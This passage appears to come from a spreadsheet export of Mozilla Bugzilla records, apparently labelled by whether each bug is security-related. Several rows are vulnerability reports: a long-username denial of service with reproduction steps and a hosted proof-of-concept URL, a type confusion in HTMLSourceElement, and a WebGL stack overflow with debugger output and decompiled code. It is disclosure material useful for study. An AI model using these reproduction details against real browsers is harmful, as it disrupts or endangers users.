[task 2020-06-15T16:34:23.091Z] 16:34:23     INFO -  /builds/worker/checkouts/gecko/config/recurse.mk:74: recipe for target 'security/sandbox/linux/target' failed
[task 2020-06-15T16:34:23.091Z] 16:34:23    ERROR -  make[3]: *** [security/sandbox/linux/target] Error 2
[task 2020-06-15T16:34:23.091Z] 16:34:23     INFO -  make[3]: *** Waiting for unfinished jobs....
[task 2020-06-15T16:34:23.113Z] 16:34:23     INFO -  make[4]: Entering directory '/builds/worker/workspace/obj-build/toolkit/crashreporter/minidump-analyzer'
[task 2020-06-15T16:34:23.113Z] 16:34:23     INFO -  /builds/worker/workspace/obj-build/_virtualenvs/init_py3/bin/python -m mozbuild.action.check_binary --target ../../../dist/bin/minidump-analyzer
[task 2020-06-15T16:34:23.113Z] 16:34:23     INFO -  TEST-PASS | check_stdcxx | minidump-analyzer</t>
        </is>
      </c>
      <c r="X1914" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1915">
      <c r="A1915" t="n">
        <v>1360842</v>
      </c>
      <c r="B1915" t="inlineStr">
        <is>
          <t>2017-04-29 09:53:01 -0700</t>
        </is>
      </c>
      <c r="C1915" t="inlineStr">
        <is>
          <t>DOS using long Username in URL scheme</t>
        </is>
      </c>
      <c r="D1915" t="inlineStr">
        <is>
          <t>2024-05-30 09:32:37 -0700</t>
        </is>
      </c>
      <c r="E1915" t="n">
        <v>1</v>
      </c>
      <c r="F1915" t="n">
        <v>1</v>
      </c>
      <c r="G1915" t="n">
        <v>3</v>
      </c>
      <c r="H1915" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1915" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1915" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K1915" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1915" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1915" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1915" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1915" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1915" t="inlineStr">
        <is>
          <t>[reporter-external] [web-bounty-form] [verif?][adv-main55+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1915" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1915" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1915" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T1915" t="n">
        <v>1</v>
      </c>
      <c r="U1915" t="n">
        <v>0</v>
      </c>
      <c r="V1915" t="n">
        <v>16</v>
      </c>
      <c r="W1915" t="inlineStr">
        <is>
          <t>Created attachment 8863148
In the scheme: http://UserName:Password@mozilla.org → By submitting a very long value for UserName, DOS is performed.
User Agent:
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Description:
- To send username and password with a URL, we use this scheme: http://UserName:Password@mozilla.org
- Opon visiting URL's of this scheme a prompt box is displayed confirming the login.
- The prompt box displays a message containing the username (From the URL).
- By supplying a very long value for the username we can make the prompt box crash. (Not a browser crash)
- This crash will cause DOS for the victim, and his browser will get locked out.
Note: I am able to crash with 10k characters long username.
Proof of Concept:
I can always reproduce by following these steps:
1. Start Firefox by clicking on the desktop icon
2. Press Cmd+N (or Ctrl+N for Windows users) to open a new browser window
3. Host the "Crash.php" file on your webserver. (Available as an attachment)
4. Paste http://&lt;Your WebServer Address&gt;/Crash.php in the address bar and press Enter
5. You browser will get locked out(DOS).
Proof of Concept URL: http://poc.rf.gd/crash.php
Expected results: The prompt box displays correctly.
Actual results: The prompt box crashes due to which DOS attack is performed on the victim.
Impact:
An attacker can create a webpage having some content and exploit.
Now once a victim visits this webpage, his browser gets locked out and he is forcibly made to view attacker supplied content.
Recommended Fix:
In the prompt box message, long usernames should be reconfigured to partially display such as:-
UserName: ThisIsALongUserName
Partial Value: ThisIsALongUse...</t>
        </is>
      </c>
      <c r="X1915" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1916">
      <c r="A1916" t="n">
        <v>1415483</v>
      </c>
      <c r="B1916" t="inlineStr">
        <is>
          <t>2017-11-08 01:30:22 -0800</t>
        </is>
      </c>
      <c r="C1916" t="inlineStr">
        <is>
          <t>Write a rule to find and prevent unnecessary usages of Cu.importGlobalProperties</t>
        </is>
      </c>
      <c r="D1916" t="inlineStr">
        <is>
          <t>2022-08-17 14:00:53 -0700</t>
        </is>
      </c>
      <c r="E1916" t="n">
        <v>1</v>
      </c>
      <c r="F1916" t="n">
        <v>1</v>
      </c>
      <c r="G1916" t="n">
        <v>7</v>
      </c>
      <c r="H1916" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1916" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J1916" t="inlineStr">
        <is>
          <t>Lint and Formatting</t>
        </is>
      </c>
      <c r="K1916" t="inlineStr">
        <is>
          <t>3 Branch</t>
        </is>
      </c>
      <c r="L1916" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1916" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1916" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1916" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1916" t="inlineStr"/>
      <c r="Q1916" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1916" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1916" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1916" t="n">
        <v>1</v>
      </c>
      <c r="U1916" t="n">
        <v>0</v>
      </c>
      <c r="V1916" t="n">
        <v>14</v>
      </c>
      <c r="W1916" t="inlineStr">
        <is>
          <t>Cu.importGlobalProperties takes an array of strings that are globals to import.
Over time, some of the properties have been defined in the global scope for jsms via webidls exposed to the system, or by default.
Hence, we should be able to detect those and remove the unnecessary calls.
We might need to have a whitelist of interfaces already exposed to the System, or a way to manually generate that list occasionally.
Existing exported interfaces:
By default: http://searchfox.org/mozilla-central/rev/ed212c79cfe86357e9a5740082b9364e7f6e526f/js/xpconnect/loader/mozJSComponentLoader.cpp#134-140
By webidl:
http://searchfox.org/mozilla-central/search?q=%3DSystem&amp;case=false&amp;regexp=false&amp;path=webidl
http://searchfox.org/mozilla-central/search?q=%2CSystem&amp;case=false&amp;regexp=false&amp;path=webidl</t>
        </is>
      </c>
      <c r="X1916" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1917">
      <c r="A1917" t="n">
        <v>1134560</v>
      </c>
      <c r="B1917" t="inlineStr">
        <is>
          <t>2015-02-19 02:07:36 -0800</t>
        </is>
      </c>
      <c r="C1917" t="inlineStr">
        <is>
          <t>Type confusion in HTMLSourceElement::BindToTree</t>
        </is>
      </c>
      <c r="D1917" t="inlineStr">
        <is>
          <t>2024-05-30 08:40:01 -0700</t>
        </is>
      </c>
      <c r="E1917" t="n">
        <v>1</v>
      </c>
      <c r="F1917" t="n">
        <v>1</v>
      </c>
      <c r="G1917" t="n">
        <v>3</v>
      </c>
      <c r="H1917" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1917" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1917" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1917" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1917" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1917" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1917" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1917" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1917" t="inlineStr">
        <is>
          <t>[adv-main37+]</t>
        </is>
      </c>
      <c r="Q1917" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1917" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1917" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1917" t="n">
        <v>1</v>
      </c>
      <c r="U1917" t="n">
        <v>0</v>
      </c>
      <c r="V1917" t="n">
        <v>3</v>
      </c>
      <c r="W1917" t="inlineStr">
        <is>
          <t>Created attachment 8566442
testcase
When binding a &lt;source&gt; element to a tree the functions checks for any siblings of the type &lt;img&gt;. It fails to validate the namespace and only checks for the tag name:
  if (aParent &amp;&amp; aParent-&gt;IsNodeOfType(nsINode::eMEDIA)) {
    HTMLMediaElement* media = static_cast&lt;HTMLMediaElement*&gt;(aParent);
    media-&gt;NotifyAddedSource();
  } else if (aParent &amp;&amp; aParent-&gt;Tag() == nsGkAtoms::picture) {
    // Find any img siblings after this &lt;source&gt; and notify them
    nsCOMPtr&lt;nsINode&gt; sibling = AsContent();
    while ( (sibling = sibling-&gt;GetNextSibling()) ) {
      if (sibling-&gt;Tag() == nsGkAtoms::img) {
        HTMLImageElement *img = static_cast&lt;HTMLImageElement*&gt;(sibling.get());
        img-&gt;PictureSourceAdded(AsContent());
      }
    }
  }
  This can result in a type confusion. See attached testcase which demonstrates the issue. ASan detects this issue as a use-after-free (output attached). This vulnerability can also be triggered on the stable release version of Firefox without &lt;picture&gt; being enabled as the check in the code only validates the tag name. The testcase on crashes on Windows accessing on mapped memory during garbage collection.</t>
        </is>
      </c>
      <c r="X1917" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1918">
      <c r="A1918" t="n">
        <v>711796</v>
      </c>
      <c r="B1918" t="inlineStr">
        <is>
          <t>2011-12-17 21:51:49 -0800</t>
        </is>
      </c>
      <c r="C1918" t="inlineStr">
        <is>
          <t>release sanity should use different l10n dashboard URL for final releases</t>
        </is>
      </c>
      <c r="D1918" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:56 -0700</t>
        </is>
      </c>
      <c r="E1918" t="n">
        <v>1</v>
      </c>
      <c r="F1918" t="n">
        <v>1</v>
      </c>
      <c r="G1918" t="n">
        <v>5</v>
      </c>
      <c r="H1918" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1918" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1918" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K1918" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1918" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1918" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1918" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1918" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1918" t="inlineStr">
        <is>
          <t>[releases][automation]</t>
        </is>
      </c>
      <c r="Q1918" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1918" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1918" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1918" t="n">
        <v>1</v>
      </c>
      <c r="U1918" t="n">
        <v>0</v>
      </c>
      <c r="V1918" t="n">
        <v>4</v>
      </c>
      <c r="W1918" t="inlineStr">
        <is>
          <t>release sanity tries to fetch l10n dashboard data from https://l10n-stage-sj.mozilla.org/shipping/l10n-changesets?ms=fx9.0 while it's https://l10n-stage-sj.mozilla.org/shipping/l10n-changesets?ms=fx9</t>
        </is>
      </c>
      <c r="X1918" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1919">
      <c r="A1919" t="n">
        <v>651990</v>
      </c>
      <c r="B1919" t="inlineStr">
        <is>
          <t>2011-04-21 15:11:45 -0700</t>
        </is>
      </c>
      <c r="C1919" t="inlineStr">
        <is>
          <t>Investigate crash [@ js_TraceScript]</t>
        </is>
      </c>
      <c r="D1919" t="inlineStr">
        <is>
          <t>2024-05-29 15:55:23 -0700</t>
        </is>
      </c>
      <c r="E1919" t="n">
        <v>1</v>
      </c>
      <c r="F1919" t="n">
        <v>1</v>
      </c>
      <c r="G1919" t="n">
        <v>3</v>
      </c>
      <c r="H1919" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1919" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1919" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1919" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L1919" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1919" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1919" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1919" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1919" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1919" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1919" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1919" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1919" t="n">
        <v>1</v>
      </c>
      <c r="U1919" t="n">
        <v>0</v>
      </c>
      <c r="V1919" t="n">
        <v>25</v>
      </c>
      <c r="W1919" t="inlineStr">
        <is>
          <t>Created attachment 527659
testcase2 (crashes 1.9.2)
The following was reported to security@m.o by rh01@z1p.biz.  There are several crash signatures that were observed, but the worst looking one is the one in this bug's summary:
bp-f9041a36-322d-498e-b9bb-ef4142110419 (caused by testcase2)
There may be more than one bug here.  The rest of rh0's email follows:
------
Hello Brandon,
Thanks for your answer. The modified testcase is in the attachment "testcase2.html". There is even a third distinct crash when starting it.
This testcase led to the following crashes, which are to my opinion 3 distinct ones:
1) bp-f9041a36-322d-498e-b9bb-ef4142110419
2) bp-5b1be6ee-555a-403e-86eb-b49832110419
3) bp-e165af98-a78b-4cd8-9ffe-a07562110419
4) bp-0ab9cf70-d4c5-47a8-82a0-5a3702110419
5) bp-489b103c-f765-4684-8d31-5a30d2110419
6) bp-660b8d86-a0f3-4b34-b2a3-fe2952110419
7) bp-178d6ac7-c5a1-4e84-89bc-a82012110419
8) bp-1863f900-69b9-4a8d-9486-0343c2110419
9) bp-675e6d6f-58a8-4ffa-b719-8b4d12110419
10) bp-bbf19bc6-44fc-465e-bdcf-2cda22110419
11) bp-18b9c507-dbed-405e-beae-1a69d2110417
12) bp-348e681b-3315-4b1d-9b45-6902d2110417
13) bp-87858153-b8d1-44a7-b7e4-d74d02110417 (already inside last email)
Crash type A: 13),1) access violation execute
Crash type B: 9),8),4)
access violation read at 0x20
Crash type C: 12),11),10),7),6),5),3),2) access violation write at 0x0
Crash A is maybe the most dangerous one. Though i don't know exactly how to trigger all three differently.
Here are some scenarios i tried:
Load testcase -&gt; switch on firebug -&gt; crash
Switch on firebug -&gt; load testcase -&gt; sometimes a crash -&gt; if no crash  occurs =&gt; access dom panel -&gt; crash
I think the worst crash (type A) is mostly triggered when starting firefox again after the crash.
Sometimes it loads the tabs automatically which were opened in the last session, which leads to a new crash, as it tries to load the testcase aswell.
This is crash A. (Firebug is automatically switched on in this case)
Can this automatic reopening be set? (except in the general option tab "when firefox starts").
Please keep me informed. For bugzilla I use the address rh01@z1p.biz.  As soon as the bug is
filed, can I access it over my account ? Please let me know if you need something else to proceed. I will still look if other similar testcases trigger the crashes more precisely and/or the issue can be triggered without firebug and/or exploited.
Thank you and regards,
Rh0</t>
        </is>
      </c>
      <c r="X1919" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1920">
      <c r="A1920" t="n">
        <v>1773874</v>
      </c>
      <c r="B1920" t="inlineStr">
        <is>
          <t>2022-06-11 23:55:48 -0700</t>
        </is>
      </c>
      <c r="C1920" t="inlineStr">
        <is>
          <t>WebGL glGetProgramiv Buffer Overflow Vulnerability</t>
        </is>
      </c>
      <c r="D1920" t="inlineStr">
        <is>
          <t>2024-05-20 17:07:15 -0700</t>
        </is>
      </c>
      <c r="E1920" t="n">
        <v>1</v>
      </c>
      <c r="F1920" t="n">
        <v>1</v>
      </c>
      <c r="G1920" t="n">
        <v>3</v>
      </c>
      <c r="H1920" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1920" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1920" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K1920" t="inlineStr">
        <is>
          <t>Firefox 101</t>
        </is>
      </c>
      <c r="L1920" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1920" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1920" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1920" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1920" t="inlineStr">
        <is>
          <t>[adv-main117+][adv-esr115.2+]</t>
        </is>
      </c>
      <c r="Q1920" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1920" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1920" t="inlineStr">
        <is>
          <t>118 Branch</t>
        </is>
      </c>
      <c r="T1920" t="n">
        <v>1</v>
      </c>
      <c r="U1920" t="n">
        <v>0</v>
      </c>
      <c r="V1920" t="n">
        <v>40</v>
      </c>
      <c r="W1920" t="inlineStr">
        <is>
          <t>Created attachment 9280834
poc.html
Steps to reproduce:
 A Buffer Overflow vulnerability exists in the Firefox OpenGL in glGetProgramiv. An attacker must open a arbitrary generated HTML file to exploit this vulnerability.
 * This vulnerability only works on macOS.
# Test environment
 - OS : macOS Monterey 12.4(21F79)
  - iMac GPU : AMD Radeon Pro Vega 48
  - Product : Mozilla Firefox 101.0.1 (64-bit)
  ** As of my testing, this vulnerability only works on macOS. **
Actual results:
## Root Cause Analysis
  - A Buffer Overflow vulnerability exists in the Firefox OpenGL in glGetProgramiv.
	```
	* thread #36, name = 'Compositor', queue = 'OpenGLMT', stop reason = EXC_BAD_ACCESS (code=2, address=0x700009632ff8)
	    frame #0: 0x00007ff80513dfa7 libsystem_pthread.dylib`___chkstk_darwin + 55
	libsystem_pthread.dylib`___chkstk_darwin:
	-&gt;  0x7ff80513dfa7 &lt;+55&gt;: test   qword ptr [rcx - 0x8], rcx
	    0x7ff80513dfab &lt;+59&gt;: cmp    rax, 0x1000
	    0x7ff80513dfb1 &lt;+65&gt;: jb     0x7ff80513dfcd            ; &lt;+93&gt;
	    0x7ff80513dfb3 &lt;+67&gt;: push   rax
	Target 0: (firefox) stopped.
	(lldb) reg read
	General Purpose Registers:
	       rax = 0x0000000000100000
	       rbx = 0x00007000096b1290
	       rcx = 0x0000700009633000
	       rdx = 0x0000000000000000
	       rdi = 0x0000000000040000
	       rsi = 0x0000000000000000
	       rbp = 0x00007000096b1320
	       rsp = 0x00007000096b1268
	        r8 = 0x0000000000000043
	        r9 = 0x0000000000000000
	       r10 = 0x0000000000041002
	       r11 = 0x0000000000000202
	       r12 = 0x000000012e5a7440
	       r13 = 0x0000000000000000
	       r14 = 0x000000012e5a7480
	       r15 = 0x00007000096b1c90
	       rip = 0x00007ff80513dfa7  libsystem_pthread.dylib`___chkstk_darwin + 55
	    rflags = 0x0000000000010216
	        cs = 0x000000000000002b
	        fs = 0x0000000000000000
	        gs = 0x0000000000000000
	```
  - If you debug at the point where the crash occurred, you can see that the crash occurred in OpenGL.
  ```
	(lldb) disassemble -address 0x7ff80513dfa7
	libsystem_pthread.dylib`___chkstk_darwin:
	    0x7ff80513df70 &lt;+0&gt;:   push   rcx
	    0x7ff80513df71 &lt;+1&gt;:   lea    rcx, [rsp + 0x10]
	    0x7ff80513df76 &lt;+6&gt;:   cmp    qword ptr gs:[-0x30], rcx
	    0x7ff80513df7f &lt;+15&gt;:  jb     0x7ff80513dfab            ; &lt;+59&gt;
	    0x7ff80513df81 &lt;+17&gt;:  cmp    qword ptr gs:[-0x28], rcx
	    0x7ff80513df8a &lt;+26&gt;:  jae    0x7ff80513dfab            ; &lt;+59&gt;
	    0x7ff80513df8c &lt;+28&gt;:  sub    rcx, rax
	    0x7ff80513df8f &lt;+31&gt;:  jb     0x7ff80513df9e            ; &lt;+46&gt;
	    0x7ff80513df91 &lt;+33&gt;:  cmp    qword ptr gs:[-0x28], rcx
	    0x7ff80513df9a &lt;+42&gt;:  ja     0x7ff80513df9e            ; &lt;+46&gt;
	    0x7ff80513df9c &lt;+44&gt;:  pop    rcx
	    0x7ff80513df9d &lt;+45&gt;:  ret
	    0x7ff80513df9e &lt;+46&gt;:  mov    rcx, qword ptr gs:[-0x28]
	-&gt;  0x7ff80513dfa7 &lt;+55&gt;:  test   qword ptr [rcx - 0x8], rcx
	    0x7ff80513dfab &lt;+59&gt;:  cmp    rax, 0x1000
	    0x7ff80513dfb1 &lt;+65&gt;:  jb     0x7ff80513dfcd            ; &lt;+93&gt;
	    0x7ff80513dfb3 &lt;+67&gt;:  push   rax
	    0x7ff80513dfb4 &lt;+68&gt;:  sub    rcx, 0x1000
	    0x7ff80513dfbb &lt;+75&gt;:  test   qword ptr [rcx], rcx
	    0x7ff80513dfbe &lt;+78&gt;:  sub    rax, 0x1000
	    0x7ff80513dfc4 &lt;+84&gt;:  cmp    rax, 0x1000
	    0x7ff80513dfca &lt;+90&gt;:  ja     0x7ff80513dfb4            ; &lt;+68&gt;
	    0x7ff80513dfcc &lt;+92&gt;:  pop    rax
	    0x7ff80513dfcd &lt;+93&gt;:  sub    rcx, rax
	    0x7ff80513dfd0 &lt;+96&gt;:  test   qword ptr [rcx], rcx
	    0x7ff80513dfd3 &lt;+99&gt;:  pop    rcx
	    0x7ff80513dfd4 &lt;+100&gt;: ret
	(lldb) mem read $rcx-0x8
	error: memory read failed for 0x700009632e00
  ```
  - If you check the address of `rcx - 0x8` in `qword ptr [rcx - 0x8], rcx` where the crash occurred, you can see that it points to an address that cannot be accessed.
  ``` stack trace
	(lldb) bt
	* thread #36, name = 'Compositor', queue = 'OpenGLMT', stop reason = EXC_BAD_ACCESS (code=2, address=0x700009632ff8)
	  * frame #0: 0x00007ff80513dfa7 libsystem_pthread.dylib`___chkstk_darwin + 55
	    frame #1: 0x00007ff80513df70 libsystem_pthread.dylib`thread_start + 20
	    frame #2: 0x00007ffa1e0afc16 libGLProgrammability.dylib`phase2Process + 56
	    frame #3: 0x00007ffa1e0afc16 libGLProgrammability.dylib`phase2Process + 56
	    frame #4: 0x00007ffa1e0afc16 libGLProgrammability.dylib`phase2Process + 56
	    frame #5: 0x00007ffa1e0afc16 libGLProgrammability.dylib`phase2Process + 56
	    frame #6: 0x00007ffa1e0afc16 libGLProgrammability.dylib`phase2Process + 56
	    frame #7: 0x00007ffa1e0afc16 libGLProgrammability.dylib`phase2Process + 56
	    frame #8: 0x00007ffa1e0afc16 libGLProgrammability.dylib`phase2Process + 56
	    frame #9: 0x00007ffa1e0afc16 libGLProgrammability.dylib`phase2Process + 56
	    frame #10: 0x00007ffa1e0afc16 libGLProgrammability.dylib`phase2Process + 56
	    frame #11: 0x00007ffa1e0afc16 libGLProgrammability.dylib`phase2Process + 56
	    frame #12: 0x00007ffa1e0afc16 libGLProgrammability.dylib`phase2Process + 56
	    frame #13: 0x00007ffa1e0afabb libGLProgrammability.dylib`phase2AddDef + 251
	    frame #14: 0x00007ffa1e03453c libGLProgrammability.dylib`glpASTMergePhase2 + 516
	    frame #15: 0x00007ffa1e0653bd libGLProgrammability.dylib`glpLinkProgram + 253
	    frame #16: 0x00007ffa1e084072 libGLProgrammability.dylib`ShLink + 228
	    frame #17: 0x00007ffa1e251fb7 GLEngine`gleLinkProgram + 1440
	    frame #18: 0x00007ffa1e1b8cab GLEngine`glLinkProgramARB_Exec + 291
	    frame #19: 0x00007ffa1e1bb0c2 GLEngine`glLinkProgramARB_UnpackThread + 12
	    frame #20: 0x00007ffa1e2277d1 GLEngine`gleCmdProcessor + 77
	    frame #21: 0x00007ff804f8b317 libdispatch.dylib`_dispatch_client_callout + 8
	    frame #22: 0x00007ff804f987ee libdispatch.dylib`_dispatch_lane_barrier_sync_invoke_and_complete + 60
	    frame #23: 0x00007ffa1e1bb1e9 GLEngine`glGetProgramiv_ExecThread + 29
	    frame #24: 0x0000000105b5c4b6 XUL`___lldb_unnamed_symbol112171$$XUL + 54
	    frame #25: 0x0000000106713efa XUL`___lldb_unnamed_symbol159126$$XUL + 122
	    frame #26: 0x00000001066f9bf1 XUL`___lldb_unnamed_symbol158857$$XUL + 881
	    frame #27: 0x00000001066f9825 XUL`___lldb_unnamed_symbol158856$$XUL + 101
	    frame #28: 0x00000001066d5ba8 XUL`___lldb_unnamed_symbol158352$$XUL + 72
	    frame #29: 0x000000010671e9df XUL`___lldb_unnamed_symbol159339$$XUL + 63
	    frame #30: 0x000000010670e0de XUL`___lldb_unnamed_symbol159036$$XUL + 3550
	    frame #31: 0x00000001067492bb XUL`___lldb_unnamed_symbol159722$$XUL + 763
	    frame #32: 0x0000000105c6b081 XUL`___lldb_unnamed_symbol119129$$XUL + 353
	    frame #33: 0x00000001038d8186 XUL`___lldb_unnamed_symbol22404$$XUL + 1062
	    frame #34: 0x000000010366bc24 XUL`___lldb_unnamed_symbol15500$$XUL + 5252
	    frame #35: 0x00000001038dd6bf XUL`___lldb_unnamed_symbol22430$$XUL + 447
	    frame #36: 0x000000010389c170 XUL`___lldb_unnamed_symbol21804$$XUL + 80
	    frame #37: 0x000000010366338b XUL`___lldb_unnamed_symbol15472$$XUL + 267
	    frame #38: 0x0000000102f46526 libnss3.dylib`___lldb_unnamed_symbol732$$libnss3.dylib + 310
	    frame #39: 0x00007ff8051424e1 libsystem_pthread.dylib`_pthread_start + 125
	    frame #40: 0x00007ff80513df6b libsystem_pthread.dylib`thread_start + 15
	(lldb) image list | grep XUL
	[  0] AE51D397-7A60-3944-9FE0-A57DCAD758B8 0x00000001030e2000 /Applications/Firefox.app/Contents/MacOS/XUL
	(lldb) image lookup --address 0x0000000105b5c4b6
	      Address: XUL[0x0000000002a7a4b6] (XUL.__TEXT.__text + 44532918)
	      Summary: XUL`___lldb_unnamed_symbol112171$$XUL + 54
	(lldb) image lookup --address 0x0000000106713efa
	      Address: XUL[0x0000000003631efa] (XUL.__TEXT.__text + 56819450)
	      Summary: XUL`___lldb_unnamed_symbol159126$$XUL + 122
  ```
  - Based on the above call stack, it can be inferred that this vulnerability occurs when moving from XUL to OpenGL. The next step required here is to find the root cause of the actual vulnerability in the line of code.
	```c++
	  // frame #25: 0x0000000106713efa XUL`___lldb_unnamed_symbol159126$$XUL + 122
		// bad sp value at call has been detected, the output may be wrong!
		__int64 __fastcall sub_3631E80(__int64 a1)
		{
		  __int64 v1; // rax
		  __int64 v2; // r15
		  __int64 v3; // rbx
		  void *v4; // r13
		  __int64 v6; // [rsp+0h] [rbp-40h] BYREF
		  int v7[13]; // [rsp+Ch] [rbp-34h] BYREF
		  sub_3611A00(a1 + 136, 0LL);
		  v1 = *(_QWORD *)(*(_QWORD *)(a1 + 16) + 8LL);
		  if ( v1 )
		    v1 -= 16LL;
		  v2 = **(_QWORD **)(v1 + 40);
		  sub_2A7B750(v2, *(unsigned int *)(a1 + 24));
		  LODWORD(v6) = 0;
		  sub_2A7A480(v2, *(_DWORD *)(a1 + 24), 0x8B84u, (__int64)&amp;v6);// [1]
		  v3 = (unsigned int)v6;
		  if ( (unsigned int)v6 &lt; 2uLL )
		  {
		    if ( (*(_BYTE *)(a1 + 112) &amp; 1) != 0 )
		    {
		      **(_BYTE **)(a1 + 128) = 0;
		      *(_QWORD *)(a1 + 120) = 0LL;
		    }
		    else
		    {
		      *(_WORD *)(a1 + 112) = 0;
		    }
		  }
		  else
		  {
		    v4 = (void *)moz_xmalloc((unsigned int)v6);
		    __bzero(v4, v3);
		    sub_2A7B800(v2, *(unsigned int *)(a1 + 24), (unsigned int)v3, 0LL, v4);
		    std::string::assign(a1 + 112, v4);
		    free(v4);
		  }
		  v7[0] = 0;
		  sub_2A7A480(v2, *(_DWORD *)(a1 + 24), 0x8B82u, (__int64)v7);
		  if ( v7[0] )
		  {
		    sub_362F510(&amp;v6, a1, v2);
		    sub_3611A00(a1 + 136, v6);
		  }
		  return __stack_chk_guard;
		}
	```
  ```c++
  // frame #24: 0x0000000105b5c4b6 XUL`___lldb_unnamed_symbol112171$$XUL + 54
	__int64 __fastcall sub_2A7A480(__int64 a1, unsigned int a2, unsigned int a3, __int64 a4)
	{
	  __int64 result; // rax
	  result = sub_9DEBC0((_BYTE *)a1, (__int64)"void mozilla::gl::GLContext::fGetProgramiv(GLuint, GLenum, GLint *)");
	  if ( (_BYTE)result )
	  {
	    result = (*(__int64 (__fastcall **)(_QWORD, _QWORD, __int64))(a1 + 600))(a2, a3, a4); // [2]
	    ++*(_QWORD *)(a1 + 2648);
	    if ( *(_BYTE *)(a1 + 177) )
	      return sub_2A7E050(a1, "void mozilla::gl::GLContext::fGetProgramiv(GLuint, GLenum, GLint *)");
	  }
